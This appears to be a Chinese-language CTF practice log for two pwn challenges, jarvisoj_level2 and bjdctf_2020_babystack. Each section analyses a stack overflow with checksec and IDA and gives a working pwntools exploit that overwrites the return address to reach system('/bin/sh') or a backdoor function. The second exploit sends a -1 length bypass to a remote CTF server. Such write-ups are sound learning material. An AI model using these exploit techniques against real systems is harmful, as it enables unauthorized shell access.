1. jarvisoj_level2
checksec
32 位elf ,开启了NX
IDA Pro静态调试
其中数如其名,可渗透的函数,存在栈溢出漏洞。
由于不知道为什么,gdb无法调试这个文件,因此采用IDA Pro给的数据计算。
32位elf,因此需要(0x88+0x04)位 字符
Shift + F12 发现了 /bin/sh
在main函数中发现了 call system,因此可以通过这个获取shell
构造POC
from pwn import *
sh = process ("/root/Desktop/Pwn Subject/level2")
binsh_addr = 0x0804A024
system_addr = 0x0804849E
payload = (b'A'*(0x88+0x4) + p32(system_addr) + p32(binsh_addr))
sh.sendline(payload)
sh.interactive()
成功获取shell并获取了flag.txt中的内容。
2. bjdctf_2020_babystack
checksec
就开启了NX
IDA Pro静态调试
backdoor函数,估计就是/bin/sh
main函数中存在栈溢出漏洞
使用 -1 可绕过
IDA Pro中 buf的大小为10
构造POC
from pwn import *
sh = remote ("node4.buuoj.cn",25024)
system_addr = 0x4006E6
sh.recvuntil(b"your name:")
sh.sendline('-1')
sh.recvuntil(b"name?")
payload = (b'A'*(0x10+0x08) + p64(system_addr))
sh.sendline(payload)
sh.interactive()
其中
这2行代码不可省略,否则会导致POC无法获取shell
成功获取shell并cat flag.txt
晚上的2题,明天再接再厉。